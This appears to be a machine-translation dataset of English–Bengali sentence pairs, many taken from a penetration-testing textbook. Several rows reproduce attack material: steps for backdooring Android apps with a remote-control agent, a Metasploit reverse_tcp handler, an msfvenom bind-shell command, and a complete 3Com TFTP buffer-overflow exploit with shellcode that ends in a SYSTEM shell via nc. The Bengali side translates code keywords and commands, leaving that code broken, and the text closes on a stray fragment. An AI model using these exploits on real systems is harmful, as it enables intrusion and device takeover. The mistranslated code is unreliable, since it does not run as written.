en
stringlengths
4
3.31k
translation
stringlengths
5
3.49k
target_lang
stringclasses
10 values
domain
stringclasses
6 values
complexity
stringclasses
3 values
Various USSD tags offer all sorts of functionality.
বিভিন্ন ইউএসএসডি ট্যাগ বিভিন্ন ধরণের কার্যকারিতা প্রদান করে।
bn
technical
moderate
Our example will use a more innocuous payload than the one described previously.
আমাদের উদাহরণটি পূর্বে বর্ণিতটির চেয়ে নিরীহ পেলোড ব্যবহার করবে।
bn
technical
moderate
We’ll have our device automatically dial a code to present its unique identifier in a pop-up.
আমরা আমাদের ডিভাইসটিকে স্বয়ংক্রিয়ভাবে একটি কোড ডায়াল করতে বলব যা একটি পপ-আপে তার অনন্য শনাক্তকারী উপস্থাপন করবে।
bn
technical
complex
To run the safe USSD example in SPF, choose menu option 6, then 3.) USSD Webpage Attack (Safe) u.
এসপিএফ-এ নিরাপদ ইউএসএসডি উদাহরণটি চালানোর জন্য, মেনু বিকল্প ৬ নির্বাচন করুন, তারপর ৩.) ইউএসএসডি ওয়েবপেজ অ্যাটাক (নিরাপদ) u নির্বাচন করুন।
bn
technical
moderate
You’ll be asked for the location of the web server, the name of the malicious page, and the phone number to text it to.
আপনাকে ওয়েব সার্ভারের অবস্থান, দূষিত পৃষ্ঠার নাম এবং যে ফোন নম্বরে এটি পাঠাতে হবে তা জিজ্ঞাসা করা হবে।
bn
technical
moderate
This time, instead of crashing the browser, the dialer app opens, and a pop-up notification appears.
এইবার, ব্রাউজার ক্র্যাশ করার পরিবর্তে, ডায়লার অ্যাপটি খোলে এবং একটি পপ-আপ বিজ্ঞপ্তি প্রদর্শিত হয়।
bn
technical
moderate
Though this example was not harmful to the device or its data, other USSD codes can be if they are opened in the dialer.
যদিও এই উদাহরণটি ডিভাইস বা এর ডেটার জন্য ক্ষতিকারক ছিল না, তবে অন্যান্য ইউএসএসডি কোডগুলি ডায়লারে খুললে ক্ষতিকারক হতে পারে।
bn
technical
complex
Android has a complicated relationship with security updates.
অ্যান্ড্রয়েডের নিরাপত্তা আপডেটের সাথে একটি জটিল সম্পর্ক রয়েছে।
bn
technical
moderate
The problem is that anyone can make an Android device with its own implementation of the Android OS.
সমস্যা হল যে যে কেউ অ্যান্ড্রয়েড ওএস-এর নিজস্ব বাস্তবায়ন সহ একটি অ্যান্ড্রয়েড ডিভাইস তৈরি করতে পারে।
bn
technical
complex
When Google releases a new version with a set of patches, every original equipment manufacturer (OEM) needs to port the changes to its version of Android.
যখন গুগল প্যাচগুলির একটি সেট সহ একটি নতুন সংস্করণ প্রকাশ করে, তখন প্রতিটি মূল সরঞ্জাম প্রস্তুতকারকের (OEM) অ্যান্ড্রয়েডের তার সংস্করণে পরিবর্তনগুলি পোর্ট করতে হয়।
bn
technical
complex
However, updates are not delivered consistently, which means that millions of unpatched devices may be in use.
তবে, আপডেটগুলি ধারাবাহিকভাবে সরবরাহ করা হয় না, যার অর্থ হল লক্ষ লক্ষ অপরিবর্তিত ডিভাইস ব্যবহার করা হতে পারে।
bn
technical
moderate
Now let’s turn our attention to a vulnerability that will probably never be patched: malicious applications.
আসুন এখন এমন একটি দুর্বলতার দিকে মনোযোগ দিই যা সম্ভবত কখনই প্যাচ করা হবে না: দূষিত অ্যাপ্লিকেশন।
bn
technical
moderate
We’ve studied malicious programs intermittently throughout this book.
আমরা এই বইটিতে মাঝে মাঝে দূষিত প্রোগ্রামগুলি নিয়ে গবেষণা করেছি।
bn
technical
moderate
Mobile users are inundated with reasons to download apps to their devices, and mobile malware is on the rise.
মোবাইল ব্যবহারকারীরা তাদের ডিভাইসে অ্যাপ ডাউনলোড করার জন্য বিভিন্ন কারণে জর্জরিত, এবং মোবাইল ম্যালওয়্যার বাড়ছে।
bn
technical
moderate
If a user can be tricked into installing a malicious app, the attacker can utilize Android’s APIs to steal data, gain remote control, and even attack other devices.
যদি কোনও ব্যবহারকারীকে একটি দূষিত অ্যাপ ইনস্টল করতে প্ররোচিত করা যায়, তবে আক্রমণকারী ডেটা চুরি করতে, রিমোট কন্ট্রোল পেতে এবং এমনকি অন্যান্য ডিভাইসগুলিতে আক্রমণ করতে অ্যান্ড্রয়েডের এপিআই ব্যবহার করতে পারে।
bn
technical
complex
In the Android security model, apps must request permissions to use APIs that could be used maliciously, and users must accept the requested permissions at installation.
অ্যান্ড্রয়েড সুরক্ষা মডেলটিতে, অ্যাপ্লিকেশনগুলিকে এমন এপিআই ব্যবহার করার জন্য অনুমতি চাইতে হবে যা দূষিতভাবে ব্যবহার করা যেতে পারে এবং ব্যবহারকারীদের ইনস্টলেশনের সময় অনুরোধ করা অনুমতিগুলি গ্রহণ করতে হবে।
bn
technical
complex
We can use Android permissions to control the device without running an additional exploit after the user installs the malicious app.
ব্যবহারকারী দূষিত অ্যাপটি ইনস্টল করার পরে অতিরিক্ত কোনও শোষণ না করেই আমরা অ্যান্ড্রয়েড অনুমতি ব্যবহার করে ডিভাইসটি নিয়ন্ত্রণ করতে পারি।
bn
technical
complex
SPF allows us to create a malicious app with a variety of interesting functionality.
এসপিএফ আমাদের বিভিন্ন আকর্ষণীয় কার্যকারিতা সহ একটি দূষিত অ্যাপ তৈরি করতে দেয়।
bn
technical
moderate
Earlier we used the SPF app on our pentester-controlled device to allow SPF to use the device’s mobile modem and other functionality.
আগে আমরা আমাদের পেন্টেস্টিং-নিয়ন্ত্রিত ডিভাইসে এসপিএফ অ্যাপটি ব্যবহার করেছি যাতে এসপিএফ ডিভাইসের মোবাইল মডেম এবং অন্যান্য কার্যকারিতা ব্যবহার করতে পারে।
bn
technical
complex
We can embed the agent inside any legitimate app: SPF can take a compiled APK file and backdoor it with the agent, or if we have the source code of the app, we can backdoor that as well.
আমরা যেকোনো বৈধ অ্যাপের ভিতরে এজেন্ট এম্বেড করতে পারি: এসপিএফ একটি সংকলিত APK ফাইল নিতে পারে এবং এজেন্ট দিয়ে ব্যাকডোর করতে পারে, অথবা যদি আমাদের অ্যাপের সোর্স কোড থাকে, তবে আমরা সেটিও ব্যাকডোর করতে পারি।
bn
technical
complex
The company's network was vulnerable to several attacks.
কোম্পানির নেটওয়ার্ক বেশ কয়েকটি আক্রমণের জন্য ঝুঁকিপূর্ণ ছিল।
bn
technical
moderate
Install the necessary security patches to protect your system.
আপনার সিস্টেমকে সুরক্ষিত রাখতে প্রয়োজনীয় নিরাপত্তা প্যাচগুলি ইনস্টল করুন।
bn
technical
simple
Penetration testing helps identify weaknesses in a system.
অনুপ্রবেশ পরীক্ষা একটি সিস্টেমে দুর্বলতা সনাক্ত করতে সহায়তা করে।
bn
technical
simple
A strong password is the first line of defense against unauthorized access.
একটি শক্তিশালী পাসওয়ার্ড অননুমোদিত অ্যাক্সেসের বিরুদ্ধে প্রথম সুরক্ষা স্তর।
bn
technical
simple
The hacker exploited a vulnerability in the web server.
হ্যাকার ওয়েব সার্ভারে একটি দুর্বলতার সুযোগ নিয়েছিল।
bn
technical
moderate
Regularly update your software to mitigate security risks.
নিরাপত্তা ঝুঁকি কমাতে নিয়মিত আপনার সফ্টওয়্যার আপডেট করুন।
bn
technical
simple
Social engineering is a common tactic used by attackers.
সামাজিক প্রকৌশল আক্রমণকারীদের দ্বারা ব্যবহৃত একটি সাধারণ কৌশল।
bn
technical
moderate
The firewall blocked the malicious traffic.
ফায়ারওয়াল দূষিত ট্র্যাফিককে ব্লক করেছে।
bn
technical
simple
Data encryption protects sensitive information from being compromised.
ডেটা এনক্রিপশন সংবেদনশীল তথ্যকে আপোস হওয়া থেকে রক্ষা করে।
bn
technical
moderate
The security audit revealed several critical flaws.
নিরাপত্তা নিরীক্ষণে বেশ কয়েকটি গুরুতর ত্রুটি ধরা পড়েছে।
bn
technical
moderate
Network segmentation can limit the impact of a security breach.
নেটওয়ার্ক বিভাজন নিরাপত্তা লঙ্ঘনের প্রভাব সীমিত করতে পারে।
bn
technical
moderate
The attacker used a phishing email to steal credentials.
আক্রমণকারী শংসাপত্রগুলি চুরি করতে একটি ফিশিং ইমেল ব্যবহার করেছে।
bn
technical
moderate
Implement multi-factor authentication for enhanced security.
উন্নত নিরাপত্তার জন্য মাল্টি-ফ্যাক্টর প্রমাণীকরণ প্রয়োগ করুন।
bn
technical
moderate
The incident response team investigated the security breach.
ঘটনা প্রতিক্রিয়া দল নিরাপত্তা লঙ্ঘনের তদন্ত করেছে।
bn
technical
moderate
Regular backups are essential for data recovery.
ডেটা পুনরুদ্ধারের জন্য নিয়মিত ব্যাকআপ অপরিহার্য।
bn
technical
simple
The company's security policy needs to be updated.
কোম্পানির নিরাপত্তা নীতি আপডেট করা দরকার।
bn
technical
simple
Security awareness training is crucial for all employees.
নিরাপত্তা সচেতনতা প্রশিক্ষণ সকল কর্মচারীর জন্য গুরুত্বপূর্ণ।
bn
technical
moderate
The vulnerability assessment identified several weaknesses.
দুর্বলতা মূল্যায়ন বেশ কয়েকটি দুর্বলতা চিহ্নিত করেছে।
bn
technical
moderate
The system was compromised due to a zero-day exploit.
একটি শূন্য-দিনের শোষণের কারণে সিস্টেমটি আপোস করা হয়েছিল।
bn
technical
complex
Protect your digital assets from cyber threats.
সাইবার হুমকি থেকে আপনার ডিজিটাল সম্পদ রক্ষা করুন।
bn
technical
simple
We can do the same thing for Android as long as we have an ARM cross compiler.
আমাদের অ্যান্ড্রয়েডের জন্য একই কাজ করতে পারি যদি আমাদের একটি ARM ক্রস কম্পাইলার থাকে।
bn
technical
moderate
Luckily, SPF has one. As shown in Listing 20-23, choose option 9.) Compile code to run on mobile devices from the main menu.
সৌভাগ্যবশত, SPF এর একটি আছে। তালিকা 20-23 এ দেখানো হয়েছে, প্রধান মেনু থেকে মোবাইল ডিভাইসে চালানোর জন্য কোড কম্পাইল করতে 9 নম্বর বিকল্পটি বেছে নিন।
bn
technical
moderate
Compile code to run on mobile devices 1.) Compile C code for ARM Android spf> 1u Compiles C code to run on ARM based Android devices.
মোবাইল ডিভাইসে চালানোর জন্য কোড কম্পাইল করুন 1.) ARM Android এর জন্য C কোড কম্পাইল করুন spf> 1u ARM ভিত্তিক Android ডিভাইসে চালানোর জন্য C কোড কম্পাইল করে।
bn
technical
moderate
Supply the C code file and the output filename File to Compile: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv Output File: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
C কোড ফাইল এবং আউটপুট ফাইলের নাম সরবরাহ করুন ফাইল কম্পাইল করতে: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv আউটপুট ফাইল: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
bn
technical
complex
Select 1.) Compile C code for ARM Android u. You will be prompted for the C file to compile as well as where you want to put the compiled binary v.
1 নির্বাচন করুন।) ARM Android এর জন্য C কোড কম্পাইল করুন u। আপনাকে C ফাইলটি কম্পাইল করতে এবং সংকলিত বাইনারি v কোথায় রাখতে চান তার জন্য অনুরোধ করা হবে।
bn
technical
moderate
Now we need to download the War-FTP exploit to our infected Android device.
এখন আমাদের সংক্রমিত অ্যান্ড্রয়েড ডিভাইসে War-FTP এক্সপ্লয়েট ডাউনলোড করতে হবে।
bn
technical
moderate
From the agent commands menu, choose option 6 to download a file.
এজেন্ট কমান্ড মেনু থেকে, একটি ফাইল ডাউনলোড করতে 6 নম্বর বিকল্পটি বেছে নিন।
bn
technical
simple
You will be asked for the file to download and the delivery method, as shown in Listing 20-24.
আপনাকে ডাউনলোড করার জন্য ফাইল এবং ডেলিভারি পদ্ধতি জিজ্ঞাসা করা হবে, যেমন তালিকা 20-24 এ দেখানো হয়েছে।
bn
technical
moderate
Select a command to perform or 0 to return to the previous menu spf> 6 Downloads a file to the phone.
সম্পাদন করার জন্য একটি কমান্ড নির্বাচন করুন বা আগের মেনুতে ফিরে যেতে 0 নির্বাচন করুন spf> 6 ফোনে একটি ফাইল ডাউনলোড করে।
bn
technical
moderate
Fill in the file and the delivery method(SMS or HTTP). File to download: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter Delivery Method(SMS or HTTP): HTTP
ফাইল এবং ডেলিভারি পদ্ধতি পূরণ করুন (এসএমএস বা এইচটিটিপি)। ডাউনলোড করার জন্য ফাইল: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter ডেলিভারি পদ্ধতি (এসএমএস বা এইচটিটিপি): এইচটিটিপি
bn
technical
complex
Before we run the exploit, we need to set up a handler in Msfconsole, as shown in Listing 20-25.
এক্সপ্লয়েট চালানোর আগে, আমাদের Msfconsole-এ একটি হ্যান্ডলার সেট আপ করতে হবে, যেমন তালিকা 20-25 এ দেখানো হয়েছে।
bn
technical
moderate
Open Msfconsole on Kali, and use the multi/handler module, setting the options to match the payload in the War-FTP exploit.
কালিতে Msfconsole খুলুন এবং multi/handler মডিউলটি ব্যবহার করুন, War-FTP এক্সপ্লয়েটে পেলোডের সাথে মেলে এমন বিকল্পগুলি সেট করুন।
bn
technical
moderate
msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
msf > multi/handler ব্যবহার করুন msf exploit(handler) > পেলোড windows/meterpreter/reverse_tcp পেলোড সেট করুন => windows/meterpreter/reverse_tcp
bn
technical
complex
msf exploit(handler) > set LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.20.9:4444 [*] Starting the payload handler...
msf exploit(handler) > LHOST 192.168.20.9 LHOST সেট করুন => 192.168.20.9 msf exploit(handler) > exploit [*] 192.168.20.9:4444 [*] এ বিপরীত হ্যান্ডলার শুরু হয়েছে পেলোড হ্যান্ডলার শুরু হচ্ছে...
bn
technical
complex
Finally, it’s time to run the exploit. As shown in Listing 20-26, choose option 7.) Execute Command from the agent commands menu; you will be prompted for the command to run.
অবশেষে, এক্সপ্লয়েট চালানোর সময় এসেছে। তালিকা 20-26 এ দেখানো হয়েছে, এজেন্ট কমান্ড মেনু থেকে 7 নম্বর বিকল্পটি বেছে নিন।) কমান্ডটি কার্যকর করুন; আপনাকে চালানোর জন্য কমান্ডের জন্য অনুরোধ করা হবে।
bn
technical
moderate
Select a command to perform or 0 to return to the previous menu spf> 7 Run a command in the terminal.
সম্পাদন করার জন্য একটি কমান্ড নির্বাচন করুন বা আগের মেনুতে ফিরে যেতে 0 নির্বাচন করুন spf> 7 টার্মিনালে একটি কমান্ড চালান।
bn
technical
moderate
Fill in the command and the delivery method(SMS or HTTP). Command: warftpmeterpreter 192.168.20.10 21u Downloaded?: yesv Delivery Method(SMS or HTTP): HTTP
কমান্ড এবং ডেলিভারি পদ্ধতি পূরণ করুন (এসএমএস বা এইচটিটিপি)। কমান্ড: warftpmeterpreter 192.168.20.10 21u ডাউনলোড করা হয়েছে?: হ্যাঁv ডেলিভারি পদ্ধতি (এসএমএস বা এইচটিটিপি): এইচটিটিপি
bn
technical
complex
Tell SPF the full command, including arguments u. In this case, we need to tell the exploit the IP address and port to attack.
SPF-কে সম্পূর্ণ কমান্ডটি বলুন, যুক্তি সহ u। এই ক্ষেত্রে, আমাদের এক্সপ্লয়েটকে আক্রমণ করার জন্য আইপি ঠিকানা এবং পোর্ট বলতে হবে।
bn
technical
moderate
SPF asks if the binary was downloaded. If it was downloaded through SPF, it will be in the agent’s files directory, and SPF will need to know to run it from there.
SPF জিজ্ঞাসা করে বাইনারি ডাউনলোড করা হয়েছে কিনা। যদি এটি SPF এর মাধ্যমে ডাউনলোড করা হয়, তবে এটি এজেন্টের ফাইল ডিরেক্টরিতে থাকবে এবং SPF-কে সেখান থেকে এটি চালানোর জন্য জানতে হবে।
bn
technical
moderate
In our case, we answer yes v, then enter the delivery method as usual. Watch your Metasploit listener. In about a minute you should receive a Meterpreter prompt like the one shown next.
আমাদের ক্ষেত্রে, আমরা হ্যাঁ v উত্তর দিই, তারপর যথারীতি ডেলিভারি পদ্ধতি লিখি। আপনার Metasploit শ্রোতাকে দেখুন। প্রায় এক মিনিটের মধ্যে আপনি একটি Meterpreter প্রম্পট পাবেন যেমনটি পরবর্তীতে দেখানো হয়েছে।
bn
technical
moderate
Windows XP does not use ASLR, discussed later in this chapter, so USER32.dll is loaded into the same memory location on all Windows XP SP3 English platforms.
উইন্ডোজ এক্সপি এএসএলআর ব্যবহার করে না, যা এই অধ্যায়ে পরে আলোচনা করা হয়েছে, তাই USER32.dll সমস্ত উইন্ডোজ এক্সপি এসপি3 ইংরেজি প্ল্যাটফর্মে একই মেমরি লোকেশনে লোড হয়।
bn
technical
moderate
We have taken advantage of static DLL locations in our previous exploit exercises.
আমরা আমাদের আগের এক্সপ্লয়েট অনুশীলনে স্ট্যাটিক ডিএলএল লোকেশনগুলির সুবিধা নিয়েছি।
bn
technical
moderate
We need not have a copy of 3Com TFTP running to find the memory locations of instructions in Windows components.
উইন্ডোজ উপাদানগুলিতে নির্দেশাবলীর মেমরি অবস্থানগুলি খুঁজে বের করার জন্য আমাদের 3Com TFTP-এর একটি অনুলিপি চালানোর প্রয়োজন নেই।
bn
technical
moderate
For example, as shown in Figure 19-4, from debugging War-FTP, we can search for a JMP ESI instruction in USER32.dll.
উদাহরণস্বরূপ, চিত্র 19-4-এ দেখানো হয়েছে, War-FTP ডিবাগিং থেকে, আমরা USER32.dll-এ একটি JMP ESI নির্দেশনার জন্য অনুসন্ধান করতে পারি।
bn
technical
moderate
(It is a good idea to stick with the DLL noted in the original exploit if we don’t have a copy of the program.
(যদি আমাদের প্রোগ্রামের অনুলিপি না থাকে তবে মূল এক্সপ্লয়েটে উল্লিখিত ডিএলএল-এর সাথে লেগে থাকা একটি ভাল ধারণা।
bn
technical
moderate
We can’t be sure the program loads MSVCRT.dll, for example.)
উদাহরণস্বরূপ, আমরা নিশ্চিত হতে পারি না যে প্রোগ্রামটি MSVCRT.dll লোড করে।)
bn
technical
moderate
Of course, in our case, we have 3Com TFTP locally, but if we didn’t have access to the app, we could use Mona to look for JMP instructions inside a specific module.
অবশ্যই, আমাদের ক্ষেত্রে, আমাদের কাছে স্থানীয়ভাবে 3Com TFTP আছে, কিন্তু যদি আমাদের অ্যাপটিতে অ্যাক্সেস না থাকত, তাহলে আমরা একটি নির্দিষ্ট মডিউলের ভিতরে JMP নির্দেশনার জন্য Mona ব্যবহার করতে পারতাম।
bn
technical
complex
For example, we could look for instances of JMP ESI (or the equivalent) with the command !mona jmp -r esi -m user32, as shown in Figure 19-4.
উদাহরণস্বরূপ, আমরা চিত্র 19-4-এ দেখানো হয়েছে, !mona jmp -r esi -m user32 কমান্ডের মাধ্যমে JMP ESI (বা সমতুল্য) এর উদাহরণগুলি সন্ধান করতে পারতাম।
bn
technical
complex
And we find a JMP ESI instruction at the memory address 7E45AE4E in USER32.dll on Windows XP SP3.
এবং আমরা উইন্ডোজ এক্সপি এসপি3-এ USER32.dll-এ 7E45AE4E মেমরি ঠিকানায় একটি JMP ESI নির্দেশনা খুঁজে পাই।
bn
technical
moderate
If we change the jmp_2000 variable to this value in little-endian format, this exploit should work for our platform.
যদি আমরা ছোট-এন্ডিয়ান ফর্ম্যাটে jmp_2000 ভেরিয়েবলটিকে এই মানটিতে পরিবর্তন করি, তাহলে এই এক্সপ্লয়েটটি আমাদের প্ল্যাটফর্মের জন্য কাজ করা উচিত।
bn
technical
moderate
$jmp_2000 = "\x4E\xAE\x45\x7E";
$jmp_2000 = "\x4E\xAE\x45\x7E";
bn
technical
simple
Replacing Shellcode As noted earlier, we also need to replace the shellcode with code generated by Msfvenom.
শেলকোড প্রতিস্থাপন পূর্বে যেমন উল্লেখ করা হয়েছে, আমাদের Msfvenom দ্বারা তৈরি কোড দিয়ে শেলকোড প্রতিস্থাপন করতে হবে।
bn
technical
moderate
We can use a bind shell or any Windows payload that will fit in 344 + 129 bytes (the included shellcode plus the NOP sled).
আমরা একটি বাইন্ড শেল বা যেকোনো উইন্ডোজ পেলোড ব্যবহার করতে পারি যা 344 + 129 বাইটের মধ্যে ফিট হবে (অন্তর্ভুক্ত শেলকোড এবং NOP sled)।
bn
technical
moderate
The only bad character we need to avoid this time is the null byte.
এই সময়ে আমাদের এড়াতে হবে এমন একমাত্র খারাপ অক্ষর হল শূন্য বাইট।
bn
technical
simple
Tell Msfvenom to out- put the payload in Perl format so we can easily add it to our exploit.
Msfvenom-কে পার্ল ফর্ম্যাটে পেলোড আউটপুট করতে বলুন যাতে আমরা সহজেই এটিকে আমাদের এক্সপ্লয়েটে যোগ করতে পারি।
bn
technical
moderate
root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00' -s 473 -f perl
root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00' -s 473 -f perl
bn
technical
simple
Editing the Exploit Our generated shellcode from Msfvenom is 368 bytes, whereas the original shellcode in the public exploit was 344 bytes.
এক্সপ্লয়েট সম্পাদনা Msfvenom থেকে আমাদের তৈরি করা শেলকোড 368 বাইট, যেখানে পাবলিক এক্সপ্লয়েটের মূল শেলকোড ছিল 344 বাইট।
bn
technical
moderate
Now make the changes to the original exploit code shown in Listing 19-6.
এখন তালিকা 19-6-এ দেখানো মূল এক্সপ্লয়েট কোডে পরিবর্তন করুন।
bn
technical
simple
We delete the NOP sled and pad our exploit string with 105 bytes after the shellcode, so our return address still ends up hijacking EIP.
আমরা NOP sled মুছে ফেলি এবং শেলকোডের পরে 105 বাইট দিয়ে আমাদের এক্সপ্লয়েট স্ট্রিং প্যাড করি, যাতে আমাদের রিটার্ন ঠিকানা এখনও EIP হাইজ্যাক করে।
bn
technical
complex
Fuzzing, Porting Exploits, and Metasploit Modules 431 #!/usr/bin/perl -w #=============================================================== # 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit # By Umesh Wanve (umesh_345@yahoo.com) #=============================================================== # Credits : Liu Qixu is credited with the discovery of this vulnerability. # Reference : http://www.securityfocus.com/bid/21301 # Date : 27-02-2007 # Tested on Windows XP SP3 # You can replace shellcode with your favourite one : # Buffer overflow exists in transporting mode name of TFTP server. # So here you go. # Buffer = "\x00\x02" + "filename" + "\x00" + nop sled + Shellcode + JUMP + "\x00"; # This was written for educational purpose. Use it at your own risk. Author will not be responsible for any damage. #=============================================================== use IO::Socket; if(!($ARGV[1])) { print "\n3COM Tftp long transport name exploit\n"; print "\tCoded by Umesh wanve\n\n"; print "Use: 3com_tftp.pl <host> <port>\n\n"; exit; } $target = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) or die "Cannot connect to $ARGV[0] on port $ARGV[1]"; my($shellcode) = u "\xda\xc5\xd9\x74\x24\xf4\x5f\xb8\xd4\x9d\x5d\x7a\x29\xc9" . --snip-- "\x27\x92\x07\x7e"; print "++ Building Malicious Packet .....\n"; $padding="A" x 105; v $jmp_xp = "\x4E\xAE\x45\x7E"; w# jmp esi user32.dll windows xp sp3 english $exploit = "\x00\x02"; #write request (header) $exploit=$exploit."A"; #file name $exploit=$exploit."\x00"; #Start of transporting name $exploit=$exploit.$shellcode; #shellcode $exploit=$exploit.$padding; #padding $exploit=$exploit.$jmp_xp; #jump to shellcode $exploit=$exploit."\x00"; #end of TS mode name print $target $exploit; #Attack on victim print "++ Exploit packet sent ...\n"; print "++ Done.\n"; print "++ Telnet to 4444 on victim's machine ....\n"; sleep(2); close($target); exit; #---------------------------------------------------------------------------------------------- # milw0rm.com [2007-02-28] Listing 19-6: The ported exploit 432 Chapter 19 Our ported exploit will look like Listing 19-6, with the shellcode u, padding v, and return address w adjusted to meet our needs. If you’ve done everything correctly, when you run the ported exploit, a bind shell with System privileges will open on TCP port 4444, as shown in Listing 19-7. root@kali:~# ./exploitdbexploit.pl 192.168.20.10 69 ++ Building Malicious Packet ..... ++ Exploit packet sent ... ++ Done. ++ Telnet to 4444 on victim's machine .... root@kali:~# nc 192.168.20.10 4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> Listing 19-7: Running the ported exploit writing metasploit modules Throughout this book we have leveraged many Metasploit modules for information gathering, exploitation, post exploitation, and so on. As new vulnerabilities are discovered, Metasploit modules are written for these issues, often by members of the security community like you. Additionally, as new post-exploitation or information-gathering techniques are imple- mented by researchers, they are often ported into Metasploit modules. In this section, we will look at the basics of writing our own Metasploit exploit module.
ফ্যাজিং, এক্সপ্লয়েটগুলি পোর্টিং এবং মেটাসপ্লয়েট মডিউল 431 #!/usr/bin/perl -w #=============================================================== # 3Com TFTP পরিষেবা <= 2.0.1 (দীর্ঘ পরিবহন মোড) ওভারফ্লো পার্ল এক্সপ্লয়েট # উমেশ ওয়ানভে (umesh_345@yahoo.com) দ্বারা #=============================================================== # ক্রেডিট: এই দুর্বলতা আবিষ্কারের জন্য লিউ কিক্সুকে কৃতিত্ব দেওয়া হয়। # রেফারেন্স: http://www.securityfocus.com/bid/21301 # তারিখ: 27-02-2007 # উইন্ডোজ এক্সপি এসপি3-এ পরীক্ষিত # আপনি আপনার পছন্দের একটির সাথে শেলকোড প্রতিস্থাপন করতে পারেন: # বাফার ওভারফ্লো টিএফটিপি সার্ভারের পরিবহন মোড নামে বিদ্যমান। # তাই এখানে যান। # বাফার = "\x00\x02" + "ফাইলের নাম" + "\x00" + নপ স্লেড + শেলকোড + জাম্প + "\x00"; # এটি শিক্ষাগত উদ্দেশ্যে লেখা হয়েছে। আপনার নিজের ঝুঁকিতে এটি ব্যবহার করুন। লেখক কোনো ক্ষতির জন্য দায়ী থাকবেন না। #=============================================================== ব্যবহার করুন IO::Socket; যদি(!($ARGV[1])) { প্রিন্ট "\n3COM Tftp দীর্ঘ পরিবহন নাম এক্সপ্লয়েট\n"; প্রিন্ট "\tউমেশ ওয়ানভে দ্বারা কোড করা হয়েছে\n\n"; প্রিন্ট "ব্যবহার করুন: 3com_tftp.pl <হোস্ট> <পোর্ট>\n\n"; প্রস্থান করুন; } $লক্ষ্য = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) অথবা die "পোর্ট $ARGV[1]-এ $ARGV[0]-এর সাথে সংযোগ করতে পারছি না"; my($shellcode) = u "\xda\xc5\xd9\x74\x24\xf4\x5f\xb8\xd4\x9d\x5d\x7a\x29\xc9" . --snip-- "\x27\x92\x07\x7e"; প্রিন্ট "++ দূষিত প্যাকেট তৈরি করা হচ্ছে .....\n"; $প্যাডিং="A" x 105; v $jmp_xp = "\x4E\xAE\x45\x7E"; w# jmp esi user32.dll উইন্ডোজ এক্সপি sp3 ইংরেজি $এক্সপ্লয়েট = "\x00\x02"; #রাইট রিকোয়েস্ট (হেডার) $এক্সপ্লয়েট=$এক্সপ্লয়েট."A"; #ফাইলের নাম $এক্সপ্লয়েট=$এক্সপ্লয়েট."\x00"; #পরিবহন নামের শুরু $এক্সপ্লয়েট=$এক্সপ্লয়েট.$শেলকোড; #শেলকোড $এক্সপ্লয়েট=$এক্সপ্লয়েট.$প্যাডিং; #প্যাডিং $এক্সপ্লয়েট=$এক্সপ্লয়েট.$jmp_xp; #শেলকোডে জাম্প করুন $এক্সপ্লয়েট=$এক্সপ্লয়েট."\x00"; #টিএস মোড নামের শেষ প্রিন্ট $লক্ষ্য $এক্সপ্লয়েট; #ভিকটিমের উপর আক্রমণ প্রিন্ট "++ এক্সপ্লয়েট প্যাকেট পাঠানো হয়েছে ...\n"; প্রিন্ট "++ সম্পন্ন।\n"; প্রিন্ট "++ ভিকটিমের মেশিনে 4444-এ টেলনেট করুন ....\n"; ঘুম(2); বন্ধ($লক্ষ্য); প্রস্থান করুন; #---------------------------------------------------------------------------------------------- # milw0rm.com [2007-02-28] তালিকা 19-6: পোর্টেড এক্সপ্লয়েট 432 অধ্যায় 19 আমাদের পোর্টেড এক্সপ্লয়েট তালিকা 19-6-এর মতো দেখাবে, শেলকোড u, প্যাডিং v, এবং রিটার্ন ঠিকানা w আমাদের চাহিদা মেটাতে সমন্বয় করা হয়েছে। আপনি যদি সবকিছু সঠিকভাবে করে থাকেন, তাহলে আপনি যখন পোর্টেড এক্সপ্লয়েট চালাবেন, তখন সিস্টেমের বিশেষাধিকার সহ একটি বাইন্ড শেল TCP পোর্ট 4444-এ খুলবে, যেমন তালিকা 19-7-এ দেখানো হয়েছে। root@kali:~# ./exploitdbexploit.pl 192.168.20.10 69 ++ দূষিত প্যাকেট তৈরি করা হচ্ছে ..... ++ এক্সপ্লয়েট প্যাকেট পাঠানো হয়েছে ... ++ সম্পন্ন। ++ ভিকটিমের মেশিনে 4444-এ টেলনেট করুন .... root@kali:~# nc 192.168.20.10 4444 মাইক্রোসফ্ট উইন্ডোজ এক্সপি [সংস্করণ 5.1.2600] (C) কপিরাইট 1985-2001 মাইক্রোসফ্ট কর্পোরেশন C:\WINDOWS\system32> তালিকা 19-7: পোর্টেড এক্সপ্লয়েট চালানো মেটাসপ্লয়েট মডিউল লেখা এই বইটিতে আমরা তথ্য সংগ্রহ, শোষণ, পোস্ট শোষণ ইত্যাদির জন্য অনেক মেটাসপ্লয়েট মডিউল ব্যবহার করেছি। নতুন দুর্বলতা আবিষ্কার হওয়ার সাথে সাথে, মেটাসপ্লয়েট মডিউলগুলি এই সমস্যাগুলির জন্য লেখা হয়, প্রায়শই আপনার মতো নিরাপত্তা সম্প্রদায়ের সদস্যদের দ্বারা। এছাড়াও, গবেষকদের দ্বারা নতুন পোস্ট-শোষণ বা তথ্য-সংগ্রহ কৌশলগুলি প্রয়োগ করার সাথে সাথে, সেগুলি প্রায়শই মেটাসপ্লয়েট মডিউলগুলিতে স্থানান্তরিত হয়। এই বিভাগে, আমরা আমাদের নিজস্ব মেটাসপ্লয়েট এক্সপ্লয়েট মডিউল লেখার মূল বিষয়গুলি দেখব।
bn
technical
complex
Hashes storage.
